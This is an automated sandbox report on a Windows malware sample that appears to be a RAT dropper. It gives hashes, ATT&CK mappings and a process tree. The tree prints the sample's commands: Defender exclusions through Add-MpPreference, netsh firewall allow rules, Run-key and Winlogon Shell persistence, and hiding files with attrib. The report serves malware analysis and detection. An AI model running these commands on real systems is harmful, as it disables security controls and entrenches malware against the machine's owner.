f1410a7a92f4108531ee301c33462cb8d41ca6bf7c34b96685828e506bb86006

Analysis

max time kernel
147s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20230831-en
resource tags

arch:x64arch:x86image:win10v2004-20230831-enlocale:en-usos:windows10-2004-x64system
submitted
03-09-2023 22:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

f1410a7a92f4108531ee301c33462cb8d41ca6bf7c34b96685828e506bb86006.exe
Size

1.4MB
MD5

0fbcb6b468a3201126978c1d5bb7b41e
SHA1

52a6c87e3da3c7a15106385bb401ab253c93f055
SHA256

f1410a7a92f4108531ee301c33462cb8d41ca6bf7c34b96685828e506bb86006
SHA512

fd6879807f698b59a8a45e9da0bf6076da367c79108c7e62f0cc76c7a02a52c71b28016ef487d8f86b08e7516eee87636d16cf098a598ea2446584ce1f4f3517
SSDEEP

24576:U2G/nvxW3Ww0tRp8GiXTBhq7yRDvHcUcjUvy0lr3Tl6icOB/UWoT:UbA30H4zF0UMSAicOB/UWk

Score

10^/10

evasion persistence upx

Malware Config

Signatures

Modifies WinLogon for persistence 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1859779917-101786662-3680946609-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe,C:\\Users\\Admin\\Music\\rot.exe,"	reg.exe

Modifies Windows Firewall 1 TTPs 2 IoCs

evasion

Windows Service

T1543.003

pid	Process
2968	netsh.exe
4864	netsh.exe

ACProtect 1.3x - 1.4x DLL software 2 IoCs

Detects file using ACProtect software.

resource	yara_rule
behavioral1/files/0x0006000000023267-100.dat	acprotect
behavioral1/files/0x0006000000023267-101.dat	acprotect

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1859779917-101786662-3680946609-1000\Control Panel\International\Geo\Nation	f1410a7a92f4108531ee301c33462cb8d41ca6bf7c34b96685828e506bb86006.exe

Executes dropped EXE 3 IoCs

pid	Process
2420	7z.exe
4780	ratt.exe
2144	ratt.exe

Loads dropped DLL 1 IoCs

pid	Process
2420	7z.exe

UPX packed file 7 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0006000000023268-97.dat	upx
behavioral1/files/0x0006000000023268-99.dat	upx
behavioral1/memory/2420-98-0x0000000000400000-0x0000000000432000-memory.dmp	upx
behavioral1/files/0x0006000000023267-100.dat	upx
behavioral1/files/0x0006000000023267-101.dat	upx
behavioral1/memory/2420-102-0x0000000010000000-0x00000000100E2000-memory.dmp	upx
behavioral1/memory/2420-106-0x0000000000400000-0x0000000000432000-memory.dmp	upx

Unexpected DNS network traffic destination 3 IoCs

Network traffic to other servers than the configured DNS servers was detected on the DNS port.

description	ioc
Destination IP	208.67.222.222
Destination IP	208.67.222.222
Destination IP	208.67.222.222

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ratt = "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\ratt.exe"	reg.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery

T1018

pid	Process
2728	PING.EXE
3620	PING.EXE

Suspicious behavior: EnumeratesProcesses 36 IoCs

pid	Process
2088	powershell.exe
2088	powershell.exe
100	powershell.exe
100	powershell.exe
2760	powershell.exe
2760	powershell.exe
2096	powershell.exe
2096	powershell.exe
1212	powershell.exe
1212	powershell.exe
3412	powershell.exe
3412	powershell.exe
4780	ratt.exe
4780	ratt.exe
4780	ratt.exe
4780	ratt.exe
4780	ratt.exe
4780	ratt.exe
4780	ratt.exe
4780	ratt.exe
4780	ratt.exe
4780	ratt.exe
4780	ratt.exe
4780	ratt.exe
4780	ratt.exe
4780	ratt.exe
4780	ratt.exe
4780	ratt.exe
4780	ratt.exe
4780	ratt.exe
4780	ratt.exe
4780	ratt.exe
4780	ratt.exe
4780	ratt.exe
2144	ratt.exe
2144	ratt.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	4940	WMIC.exe
Token: SeSecurityPrivilege	4940	WMIC.exe
Token: SeTakeOwnershipPrivilege	4940	WMIC.exe
Token: SeLoadDriverPrivilege	4940	WMIC.exe
Token: SeSystemProfilePrivilege	4940	WMIC.exe
Token: SeSystemtimePrivilege	4940	WMIC.exe
Token: SeProfSingleProcessPrivilege	4940	WMIC.exe
Token: SeIncBasePriorityPrivilege	4940	WMIC.exe
Token: SeCreatePagefilePrivilege	4940	WMIC.exe
Token: SeBackupPrivilege	4940	WMIC.exe
Token: SeRestorePrivilege	4940	WMIC.exe
Token: SeShutdownPrivilege	4940	WMIC.exe
Token: SeDebugPrivilege	4940	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4940	WMIC.exe
Token: SeRemoteShutdownPrivilege	4940	WMIC.exe
Token: SeUndockPrivilege	4940	WMIC.exe
Token: SeManageVolumePrivilege	4940	WMIC.exe
Token: 33	4940	WMIC.exe
Token: 34	4940	WMIC.exe
Token: 35	4940	WMIC.exe
Token: 36	4940	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4940	WMIC.exe
Token: SeSecurityPrivilege	4940	WMIC.exe
Token: SeTakeOwnershipPrivilege	4940	WMIC.exe
Token: SeLoadDriverPrivilege	4940	WMIC.exe
Token: SeSystemProfilePrivilege	4940	WMIC.exe
Token: SeSystemtimePrivilege	4940	WMIC.exe
Token: SeProfSingleProcessPrivilege	4940	WMIC.exe
Token: SeIncBasePriorityPrivilege	4940	WMIC.exe
Token: SeCreatePagefilePrivilege	4940	WMIC.exe
Token: SeBackupPrivilege	4940	WMIC.exe
Token: SeRestorePrivilege	4940	WMIC.exe
Token: SeShutdownPrivilege	4940	WMIC.exe
Token: SeDebugPrivilege	4940	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4940	WMIC.exe
Token: SeRemoteShutdownPrivilege	4940	WMIC.exe
Token: SeUndockPrivilege	4940	WMIC.exe
Token: SeManageVolumePrivilege	4940	WMIC.exe
Token: 33	4940	WMIC.exe
Token: 34	4940	WMIC.exe
Token: 35	4940	WMIC.exe
Token: 36	4940	WMIC.exe
Token: SeDebugPrivilege	2088	powershell.exe
Token: SeDebugPrivilege	100	powershell.exe
Token: SeDebugPrivilege	2760	powershell.exe
Token: SeDebugPrivilege	2096	powershell.exe
Token: SeDebugPrivilege	1212	powershell.exe
Token: SeDebugPrivilege	3412	powershell.exe
Token: SeIncreaseQuotaPrivilege	3904	WMIC.exe
Token: SeSecurityPrivilege	3904	WMIC.exe
Token: SeTakeOwnershipPrivilege	3904	WMIC.exe
Token: SeLoadDriverPrivilege	3904	WMIC.exe
Token: SeSystemProfilePrivilege	3904	WMIC.exe
Token: SeSystemtimePrivilege	3904	WMIC.exe
Token: SeProfSingleProcessPrivilege	3904	WMIC.exe
Token: SeIncBasePriorityPrivilege	3904	WMIC.exe
Token: SeCreatePagefilePrivilege	3904	WMIC.exe
Token: SeBackupPrivilege	3904	WMIC.exe
Token: SeRestorePrivilege	3904	WMIC.exe
Token: SeShutdownPrivilege	3904	WMIC.exe
Token: SeDebugPrivilege	3904	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3904	WMIC.exe
Token: SeRemoteShutdownPrivilege	3904	WMIC.exe
Token: SeUndockPrivilege	3904	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4064 wrote to memory of 2880	4064	f1410a7a92f4108531ee301c33462cb8d41ca6bf7c34b96685828e506bb86006.exe	83
PID 4064 wrote to memory of 2880	4064	f1410a7a92f4108531ee301c33462cb8d41ca6bf7c34b96685828e506bb86006.exe	83
PID 4064 wrote to memory of 2880	4064	f1410a7a92f4108531ee301c33462cb8d41ca6bf7c34b96685828e506bb86006.exe	83
PID 2880 wrote to memory of 4324	2880	cmd.exe	86
PID 2880 wrote to memory of 4324	2880	cmd.exe	86
PID 2880 wrote to memory of 4324	2880	cmd.exe	86
PID 4324 wrote to memory of 4276	4324	cmd.exe	87
PID 4324 wrote to memory of 4276	4324	cmd.exe	87
PID 4324 wrote to memory of 4276	4324	cmd.exe	87
PID 2880 wrote to memory of 4020	2880	cmd.exe	88
PID 2880 wrote to memory of 4020	2880	cmd.exe	88
PID 2880 wrote to memory of 4020	2880	cmd.exe	88
PID 4020 wrote to memory of 4940	4020	cmd.exe	89
PID 4020 wrote to memory of 4940	4020	cmd.exe	89
PID 4020 wrote to memory of 4940	4020	cmd.exe	89
PID 2880 wrote to memory of 2088	2880	cmd.exe	91
PID 2880 wrote to memory of 2088	2880	cmd.exe	91
PID 2880 wrote to memory of 2088	2880	cmd.exe	91
PID 2880 wrote to memory of 100	2880	cmd.exe	92
PID 2880 wrote to memory of 100	2880	cmd.exe	92
PID 2880 wrote to memory of 100	2880	cmd.exe	92
PID 2880 wrote to memory of 2760	2880	cmd.exe	93
PID 2880 wrote to memory of 2760	2880	cmd.exe	93
PID 2880 wrote to memory of 2760	2880	cmd.exe	93
PID 2880 wrote to memory of 2096	2880	cmd.exe	94
PID 2880 wrote to memory of 2096	2880	cmd.exe	94
PID 2880 wrote to memory of 2096	2880	cmd.exe	94
PID 2880 wrote to memory of 1212	2880	cmd.exe	95
PID 2880 wrote to memory of 1212	2880	cmd.exe	95
PID 2880 wrote to memory of 1212	2880	cmd.exe	95
PID 2880 wrote to memory of 2420	2880	cmd.exe	96
PID 2880 wrote to memory of 2420	2880	cmd.exe	96
PID 2880 wrote to memory of 2420	2880	cmd.exe	96
PID 2880 wrote to memory of 3412	2880	cmd.exe	97
PID 2880 wrote to memory of 3412	2880	cmd.exe	97
PID 2880 wrote to memory of 3412	2880	cmd.exe	97
PID 3412 wrote to memory of 2968	3412	powershell.exe	100
PID 3412 wrote to memory of 2968	3412	powershell.exe	100
PID 3412 wrote to memory of 2968	3412	powershell.exe	100
PID 3412 wrote to memory of 4864	3412	powershell.exe	101
PID 3412 wrote to memory of 4864	3412	powershell.exe	101
PID 3412 wrote to memory of 4864	3412	powershell.exe	101
PID 3412 wrote to memory of 5020	3412	powershell.exe	102
PID 3412 wrote to memory of 5020	3412	powershell.exe	102
PID 3412 wrote to memory of 5020	3412	powershell.exe	102
PID 5020 wrote to memory of 3904	5020	cmd.exe	103
PID 5020 wrote to memory of 3904	5020	cmd.exe	103
PID 5020 wrote to memory of 3904	5020	cmd.exe	103
PID 3412 wrote to memory of 4676	3412	powershell.exe	104
PID 3412 wrote to memory of 4676	3412	powershell.exe	104
PID 3412 wrote to memory of 4676	3412	powershell.exe	104
PID 4676 wrote to memory of 3168	4676	cmd.exe	105
PID 4676 wrote to memory of 3168	4676	cmd.exe	105
PID 4676 wrote to memory of 3168	4676	cmd.exe	105
PID 3412 wrote to memory of 4780	3412	powershell.exe	106
PID 3412 wrote to memory of 4780	3412	powershell.exe	106
PID 3412 wrote to memory of 4780	3412	powershell.exe	106
PID 3412 wrote to memory of 4116	3412	powershell.exe	107
PID 3412 wrote to memory of 4116	3412	powershell.exe	107
PID 3412 wrote to memory of 4116	3412	powershell.exe	107
PID 2880 wrote to memory of 228	2880	cmd.exe	108
PID 2880 wrote to memory of 228	2880	cmd.exe	108
PID 2880 wrote to memory of 228	2880	cmd.exe	108
PID 2880 wrote to memory of 2144	2880	cmd.exe	109

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4116	attrib.exe

C:\Users\Admin\AppData\Local\Temp\f1410a7a92f4108531ee301c33462cb8d41ca6bf7c34b96685828e506bb86006.exe
"C:\Users\Admin\AppData\Local\Temp\f1410a7a92f4108531ee301c33462cb8d41ca6bf7c34b96685828e506bb86006.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4064
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ratt.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2880
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c nslookup myip.opendns.com. resolver1.opendns.com
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4324
  - - C:\Windows\SysWOW64\nslookup.exe
      nslookup myip.opendns.com. resolver1.opendns.com
      4⤵
      PID:4276
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic ComputerSystem get Domain
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4020
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic ComputerSystem get Domain
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4940
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command 'Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\ratt.exe"'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2088
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command 'Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\"'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:100
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command 'Add-MpPreference -ExclusionPath "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ratt.exe"'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2760
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command 'Add-MpPreference -ExclusionPath "$Env:SystemDrive\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2096
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command 'Add-MpPreference -ExclusionProcess "C:\Users\Admin\AppData\Local\Temp\ratt.exe"'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1212
- - C:\Users\Admin\AppData\Local\Temp\7z.exe
    7z.exe x -o"C:\Users\Admin\AppData\Local\Temp" -y ratt.7z
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:2420
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -executionpolicy RemoteSigned -WindowStyle Hidden -file Add.ps1
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3412
  - - C:\Windows\SysWOW64\netsh.exe
      "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=SecuritySystem dir=in action=allow "program=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      PID:2968
  - - C:\Windows\SysWOW64\netsh.exe
      "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=SecuritySystem dir=out action=allow "program=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      PID:4864
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:5020
    - - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic computersystem where name="IIHAOZGI" set AutomaticManagedPagefile=False
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3904
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4676
    - - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic pagefileset where name="C:\\pagefile.sys" set InitialSize=15000,MaximumSize=20000
        5⤵
        
        PID:3168
  - - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe
      "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe"
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      PID:4780
    - - C:\Windows\SysWOW64\cmd.exe
        
        "cmd" /c ping 127.0.0.1 -n 10 > nul && REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\Music\rot.exe,"
        5⤵
        
        PID:3348
      - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 10
        6⤵
        Runs ping.exe
        
        PID:2728
      - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\Music\rot.exe,"
        6⤵
        Modifies WinLogon for persistence
        
        PID:4776
    - - C:\Windows\SysWOW64\cmd.exe
        
        "cmd" /c ping 127.0.0.1 -n 15 > nul && copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" "C:\Users\Admin\Music\rot.exe" && ping 127.0.0.1 -n 15 > nul && "C:\Users\Admin\Music\rot.exe"
        5⤵
        
        PID:2424
      - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 15
        6⤵
        Runs ping.exe
        
        PID:3620
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\system32\attrib.exe" +h "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe"
      4⤵
      Views/modifies file attributes
      PID:4116
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "ratt" /t REG_SZ /d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ratt.exe" /F
    3⤵
    - Adds Run key to start application
    PID:228
- - C:\Users\Admin\AppData\Local\Temp\ratt.exe
    "ratt.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:2144

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe

Filesize
742.5MB

MD5
eb735967d01cb9a1a4f28c3d990c3ad1

SHA1
53a4dae92057dbe7bd75e00aa296d741734bbbd3

SHA256
6b8999e23786bc1097b4dbdf8c7f1b4ec884249d57dbd3421d1913ce11c5997b

SHA512
2fc39a069aafedaa6f35544ec3aa66661c164097ce1dde4fa70c9367cf1812af7e6fac3a1c3da49475494296ddcdfae2f9f599e3e02912b29c6a0e03afdfddb0

Download Submit
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe

Filesize
295.9MB

MD5
b84223176595b2c9badcff2739c672b9

SHA1
c48ff5677ef9c21d96d9208d07238f5ab1d6ba51

SHA256
472fbe1f9c34435ceacdff6fb1d259fcc7b6a77f193a708b90369f6ecb848a9f

SHA512
afbea5b398524c712e4147f6d685a2d4b544ca4fa4c8eecbe8af6df173bceada74e47d3c6926d8ac0cd3993cae80640db4677846f0124118f9209fa033aa2a9d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
1KB

MD5
33b19d75aa77114216dbc23f43b195e3

SHA1
36a6c3975e619e0c5232aa4f5b7dc1fec9525535

SHA256
b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2

SHA512
676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
11KB

MD5
5bbc4a604c6fb48e3e589eba4be4d157

SHA1
299131bc8d9c6a1b0af1d1749132ee18489ce80b

SHA256
694cdc5b0bf2580884bcce1ec6be0b194853dba157442585a9ec4da0eef7c150

SHA512
efea75915d7e08748139fdeea418b4645c5329ea414d69be4864501d518275debc75f56e2afae2d113282b12c469073dfb262512accdb45d221de0424dc5c3f4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
11KB

MD5
2719c42baee36e1cff9633821f922b02

SHA1
cd13dc5a6c066c029aac459050aea7e39754115c

SHA256
b0cca864e9423aa08e122a6acca6ba6eddc05f8e2029ee5fc1de7332ee67b338

SHA512
e20b8d712cd6c70226ecdde70c19f7c989474c03b957ae1d8b8b538a3e80e5c0137ea42bd37ebe322b42b427549a4e9adea8343595f44439dbf6a4c284a173b3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
11KB

MD5
819f905696d5e237344cd904b6120f61

SHA1
6b79750e63b299282723148ee7917676d2140d96

SHA256
90afaf2ef78cfd5a88500d1593d42cafb392a22b64a21169df9e97e02a864002

SHA512
d94322c2db2dd1083ee91a72d5818f06ced8b92655d9d6eb8d757c2622f70dc63e64e6012ef18da2946e74bf0029544fdc6d62d036b0434dbe88303ba7e8deb4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
11KB

MD5
cf17e2d6130f68c6faf7cfb4151f074f

SHA1
c82816d5dd9a0071ef61deb7e886a957f6a8f9ac

SHA256
2a346f06a002994d433115661a225fb6779dfc7c8bfd65089ce31debab786676

SHA512
75945e33ac382b1a534ee2801f0d53c40f5725993f85edbd4d79a1f2aa126e567192b39aafbfeee8d8663e459581ef8f0c0789f9594a6bd342b6f0b1714be23f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
11KB

MD5
e5c7a495683e4dbbeb91c12a0ea65d17

SHA1
b97aaf3c0ac7b37dcc783c37dd698e5df59e56a2

SHA256
67df6fa2d75fcaece0ba9f90377485e57f70fabb1c7f2e8a7d9055033e9c0a90

SHA512
6af13dc46255f2abdf9a88e9f6bc2419ce177e8dcbe0d9c8faa3355708531960c7b556f77536efd06b52ca3e8e31a3ae609f2e19a810e06e63398b3efc0194b1

Download Submit
C:\Users\Admin\AppData\Local\Temp\7z.dll

Filesize
328KB

MD5
15bbbe562f9be3e5dcbb834e635cc231

SHA1
7c01cf5fa4db2312c5ed2f7b8c41e3e5c346a51a

SHA256
ed50ef8e0b6dd83fb0c3f733329d4aa6e5a3beb3491e2ba9d2ae206813508dde

SHA512
769287951b8c16f4b10c1b58e82612844babe7b5c10445fe848d713fb5e8321bcbbd9780e9c564cffe35ea4144e8a7e19645291c4eea372fcaa19ae395a97287

Download Submit
C:\Users\Admin\AppData\Local\Temp\7z.dll

Filesize
328KB

MD5
15bbbe562f9be3e5dcbb834e635cc231

SHA1
7c01cf5fa4db2312c5ed2f7b8c41e3e5c346a51a

SHA256
ed50ef8e0b6dd83fb0c3f733329d4aa6e5a3beb3491e2ba9d2ae206813508dde

SHA512
769287951b8c16f4b10c1b58e82612844babe7b5c10445fe848d713fb5e8321bcbbd9780e9c564cffe35ea4144e8a7e19645291c4eea372fcaa19ae395a97287

Download Submit
C:\Users\Admin\AppData\Local\Temp\7z.exe

Filesize
71KB

MD5
8ba2e41b330ae9356e62eb63514cf82e

SHA1
8dc266467a5a0d587ed0181d4344581ef4ff30b2

SHA256
ea2ad8d87b79c8eb3952498c7005a195986436cfd7ca7736dbbdda979142daea

SHA512
2fdfc2d368c70320b3dac00fef06381ef90a2a82a1f3137109b033d84e5b70185039af6ec918012dc03bc9d046cd8d8aee3247ba0f59d394e78f1f73380f7a1d

Download Submit
C:\Users\Admin\AppData\Local\Temp\7z.exe

Filesize
71KB

MD5
8ba2e41b330ae9356e62eb63514cf82e

SHA1
8dc266467a5a0d587ed0181d4344581ef4ff30b2

SHA256
ea2ad8d87b79c8eb3952498c7005a195986436cfd7ca7736dbbdda979142daea

SHA512
2fdfc2d368c70320b3dac00fef06381ef90a2a82a1f3137109b033d84e5b70185039af6ec918012dc03bc9d046cd8d8aee3247ba0f59d394e78f1f73380f7a1d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Add.ps1

Filesize
1KB

MD5
0df43097e0f0acd04d9e17fb43d618b9

SHA1
69b3ade12cb228393a93624e65f41604a17c83b6

SHA256
c8e4a63337a25f55f75ad10ab2b420d716bad4b35a2044fd39dcd5936419d873

SHA512
01ae71dd2ee040baad6f4b9afcfbaeca2b9f6cc7d60ade5de637238d65c17d74292734666f4ae6b533f6bf1007c46387d8e690d97c3b7a535bcd6f216e70c4fb

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fztoecaj.tm3.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\ratt.7z

Filesize
693KB

MD5
7de6fdf3629c73bf0c29a96fa23ae055

SHA1
dcb37f6d43977601c6460b17387a89b9e4c0609a

SHA256
069979bfb2aefe3cac239fe4f2477672eb75b90c9853fb67b2ac1438f2ec44ff

SHA512
d1ef2299aacf429572fd6df185009960e601e49126f080fdced26ec407e5db86eaa902e474635464aac146b7de286667a398f2c5e46c4a821dad2579bfb3acf8

Download Submit
C:\Users\Admin\AppData\Local\Temp\ratt.bat

Filesize
1KB

MD5
7ea1fec84d76294d9256ae3dca7676b2

SHA1
1e335451d1cbb6951bc77bf75430f4d983491342

SHA256
9a419095c0bafc6b550f3f760c7b4f91ef3a956cfa6403d3750164ecdbe35940

SHA512
ab712c45081b3d1c7edd03e67a8db1518a546f3fbf00e99838dfe03a689c4867a6953e6603dcd2be458b2441f4a2b70286fd7d096549cfcf032dd2cd54d68317

Download Submit
C:\Users\Admin\AppData\Local\Temp\ratt.exe

Filesize
745.1MB

MD5
be788bb3680cf3809d9678ee6f7ba321

SHA1
499f01d5f654f83e172004dcc03f99abdd251734

SHA256
03a17a2b669f72df082569ea477977d824796da3b6b7a8d0e6f91f2629ef406b

SHA512
83c0b885740a57b84b2c909d0d6bb25baaa49d62499773030b59058325f37a5fcf39a1cd59ef9c229ca7289af7250034f6652e449625b67c2d260b285ddb9a8e

Download Submit
C:\Users\Admin\AppData\Local\Temp\ratt.exe

Filesize
263.9MB

MD5
a70608a4f9a351309f1bbe23c802bcdc

SHA1
d369483feeea7c79f70a33b22b8599db365b43fd

SHA256
bca808c6eb84fc9d5f44bde88c3fa25ff1e2299d4267d8e430c81d466e396859

SHA512
8ef51e50dfe4fd57e77cce453bf35928becd598aa0c31f46abde328594f6fce8a97608109bd3e194b6b7b51da08173ff82c6192ee025cbab74cedf67971e10a6

Download Submit
memory/100-38-0x0000000002C10000-0x0000000002C20000-memory.dmp

Filesize
64KB

Download
memory/100-37-0x0000000002C10000-0x0000000002C20000-memory.dmp

Filesize
64KB

Download
memory/100-49-0x0000000002C10000-0x0000000002C20000-memory.dmp

Filesize
64KB

Download
memory/100-51-0x00000000750B0000-0x0000000075860000-memory.dmp

Filesize
7.7MB

Download
memory/100-36-0x00000000750B0000-0x0000000075860000-memory.dmp

Filesize
7.7MB

Download
memory/1212-80-0x00000000750B0000-0x0000000075860000-memory.dmp

Filesize
7.7MB

Download
memory/1212-95-0x00000000750B0000-0x0000000075860000-memory.dmp

Filesize
7.7MB

Download
memory/1212-93-0x0000000003250000-0x0000000003260000-memory.dmp

Filesize
64KB

Download
memory/1212-82-0x0000000003250000-0x0000000003260000-memory.dmp

Filesize
64KB

Download
memory/1212-81-0x0000000003250000-0x0000000003260000-memory.dmp

Filesize
64KB

Download
memory/2088-31-0x0000000005320000-0x0000000005330000-memory.dmp

Filesize
64KB

Download
memory/2088-22-0x0000000006070000-0x00000000060D6000-memory.dmp

Filesize
408KB

Download
memory/2088-17-0x0000000005960000-0x0000000005F88000-memory.dmp

Filesize
6.2MB

Download
memory/2088-15-0x0000000005320000-0x0000000005330000-memory.dmp

Filesize
64KB

Download
memory/2088-18-0x0000000005720000-0x0000000005742000-memory.dmp

Filesize
136KB

Download
memory/2088-19-0x0000000006000000-0x0000000006066000-memory.dmp

Filesize
408KB

Download
memory/2088-13-0x0000000002DE0000-0x0000000002E16000-memory.dmp

